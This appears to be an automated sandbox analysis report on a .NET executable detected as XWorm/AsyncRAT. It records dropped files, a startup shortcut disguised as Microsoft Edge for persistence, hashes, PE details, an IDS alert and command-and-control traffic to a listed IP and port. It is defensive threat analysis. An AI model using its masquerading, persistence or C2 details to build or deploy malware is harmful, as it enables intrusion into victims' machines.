                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kico0i5w.mbk.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktixuf0i.drk.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofex103n.x2g.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozsrukil.23k.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2vkyzog.dkp.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkwkcuh3.imt.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcfoyfdw.kbz.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsbttklj.d5n.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4vwopw4.vhc.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 15 20:10:52 2024, mtime=Fri Nov 15 20:10:52 2024, atime=Fri Nov 15 20:10:52 2024, length=192512, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):760
                                                                        Entropy (8bit):5.0312680934748535
                                                                        Encrypted:false
                                                                        SSDEEP:12:8HyyyjKg4fMtBj088CNlsY//tSLKRKKcjAsyVH5mpL9fmV:8Hyyy6fcjf8OZFsKRR4AsyypBm
                                                                        MD5:C94B81E1D2AD459122D12B6CAA99EFF6
                                                                        SHA1:55224FCAD34DB33E05618F9ABC0457D5D63C7F74
                                                                        SHA-256:5B7F4290994F2E71E73E07C80ACF6BD90F115CE23073E57AC7494B68E69ABF20
                                                                        SHA-512:4036AAC1A1EC8D2F7936C35F3DF5C44434A590E50572259FF490C699940D0761FD99B806E9F00F7DBBF5DD7C0314696FCD3C1E44117E73E08D7C4DDE7EC25A62
                                                                        Malicious:false
                                                                        Preview:L..................F.... .....$.7....$.7....$.7..........................t.:..DG..Yr?.D..U..k0.&...&...... M.....g...7....+.7......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSloY@.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....oY<...Roaming.@......DWSloY<.....C.....................p...R.o.a.m.i.n.g.....`.2.....oY[. .msedge.exe..F......oY[.oY[...........................t...m.s.e.d.g.e...e.x.e.......Y...............-.......X....................C:\Users\user\AppData\Roaming\msedge.exe........\.....\.....\.....\.....\.m.s.e.d.g.e...e.x.e.`.......X.......571345...........hT..CrF.f4... .$.......,...W..hT..CrF.f4... .$.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                        C:\Users\user\AppData\Roaming\msedge.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):192512
                                                                        Entropy (8bit):6.3678048620261904
                                                                        Encrypted:false
                                                                        SSDEEP:3072:2rhv4AbmL4mkbrz9EO7PvJKRUGKXs+S++7KFSbxeY+qDDrMn:2r7bmclbX3ZGqStKEbxI
                                                                        MD5:E796B778B392F06DE4D340EC0F88B4CC
                                                                        SHA1:32561BF3B022AEF8A62BAC3E820EF7E3BC648F57
                                                                        SHA-256:1FF08D4CBE1A41C10692941C7835B93EA5738057DC381CF4704136436911DF05
                                                                        SHA-512:DCDBEB8D1720B2BFE8CE8C2311414B71EC090EB94DB53D379C08CBF7B17A25AC4BC9488315E867406BB1661A76DF223C953F01C7D40997FDF9CCB20DAAF4C8C7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g............................>.... ... ....@.. .......................@............@.....................................W.... ..z.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...z.... ......................@..@.reloc....... ......................@..B................ .......H........W..........&.....................................................(....*.r...p*. *p{.*..(....*.r!..p*. .e..*.s.........s.........s.........s.........*.rA..p*. ..e.*.ra..p*. ..?.*.r...p*. .x!.*.r...p*. .3..*.r...p*..((...*.r...p*. E/..*.r...p*. i...*&(....&+.*.+5sW... .... .'..oX...(*...~....-.(D...(6...~....oY...&.-.*.r...p*. ...*.r...p*. .l..*.rM..p*. ....*.r...p*. ..3.*.r...p*. .;..*..............j..................sZ..............*"(F...+.*:.t....(A...+.*.ry..p*.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.3678048620261904
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:msedge_visual_render.exe
                                                                        File size:192'512 bytes
                                                                        MD5:e796b778b392f06de4d340ec0f88b4cc
                                                                        SHA1:32561bf3b022aef8a62bac3e820ef7e3bc648f57
                                                                        SHA256:1ff08d4cbe1a41c10692941c7835b93ea5738057dc381cf4704136436911df05
                                                                        SHA512:dcdbeb8d1720b2bfe8ce8c2311414b71ec090eb94db53d379c08cbf7b17a25ac4bc9488315e867406bb1661a76df223c953f01c7d40997fdf9ccb20daaf4c8c7
                                                                        SSDEEP:3072:2rhv4AbmL4mkbrz9EO7PvJKRUGKXs+S++7KFSbxeY+qDDrMn:2r7bmclbX3ZGqStKEbxI
                                                                        TLSH:1E147F1C6F8AB4EBE4684EB55C76E6D1073CEFA5E4A2529C30E8AE3D7752474C500BE0
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g............................>.... ... ....@.. .......................@............@................................

                                                                        File Icon

                                                                        Icon Hash:170105b232472f1f

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x410c3e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x67350080 [Wed Nov 13 19:39:44 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x10be40x57.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x1fd7a.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xec440xee00fc6d8f259588e0b8aa6c68eac805e6c5False0.612296481092437data6.102243758138122IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x120000x1fd7a0x1fe00d30e121a0f46ac585ee7407f60dc3e71False0.4359911151960784data6.174346559787132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x320000xc0x200793e22be1aa76d7a4ed9f01d024837a3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x122200x7198PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990027510316368
                                                                        RT_ICON0x193b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.21535253756062936
                                                                        RT_ICON0x29be00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3363249881908361
                                                                        RT_ICON0x2de080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4050829875518672
                                                                        RT_ICON0x303b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5145403377110694
                                                                        RT_ICON0x314580x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7411347517730497
                                                                        RT_GROUP_ICON0x318c00x5adata0.7333333333333333
                                                                        RT_VERSION0x3191c0x274data0.4570063694267516
                                                                        RT_MANIFEST0x31b900x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-15T22:11:56.561263+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549984147.185.221.2357660TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 15, 2024 22:10:53.377989054 CET4986257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:10:53.386709929 CET5766049862147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:10:53.386862040 CET4986257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:10:53.483551979 CET4986257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:10:53.489047050 CET5766049862147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:01.868827105 CET5766049862147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:01.869036913 CET4986257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:02.259934902 CET4986257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:02.262041092 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:02.265139103 CET5766049862147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:02.267146111 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:02.267319918 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:02.280893087 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:02.285950899 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:10.738257885 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:10.739625931 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:12.900451899 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:12.901459932 CET4995057660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.212819099 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.815366983 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.912349939 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:13.912375927 CET5766049950147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:13.912390947 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:13.912404060 CET5766049908147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:13.912456036 CET4995057660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.912503958 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.915364027 CET4990857660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.925584078 CET4995057660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:13.930588961 CET5766049950147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:22.441920042 CET5766049950147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:22.442087889 CET4995057660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:23.838093042 CET4995057660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:23.839392900 CET4998157660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:23.843554020 CET5766049950147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:23.845032930 CET5766049981147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:23.845252037 CET4998157660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:23.858897924 CET4998157660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:23.864476919 CET5766049981147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:32.352488995 CET5766049981147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:32.352921009 CET4998157660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:35.041004896 CET4998157660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:35.045072079 CET4998257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:35.048455000 CET5766049981147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:35.052170038 CET5766049982147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:35.052419901 CET4998257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:35.071655989 CET4998257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:35.076957941 CET5766049982147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:43.555883884 CET5766049982147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:43.556011915 CET4998257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:43.728457928 CET4998257660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:43.730357885 CET4998357660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:43.733491898 CET5766049982147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:43.735471010 CET5766049983147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:43.735563040 CET4998357660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:43.748497009 CET4998357660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:43.753542900 CET5766049983147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:52.212009907 CET5766049983147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:52.212346077 CET4998357660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:52.275240898 CET4998357660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:52.276242018 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:52.280355930 CET5766049983147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:52.281148911 CET5766049984147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:52.281227112 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:52.292988062 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:52.297929049 CET5766049984147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:11:56.561263084 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:11:56.566921949 CET5766049984147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:00.768256903 CET5766049984147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:00.768336058 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.559405088 CET4998457660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.561994076 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.565253973 CET5766049984147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.567225933 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.567406893 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.704862118 CET4998557660192.168.2.5147.185.221.23
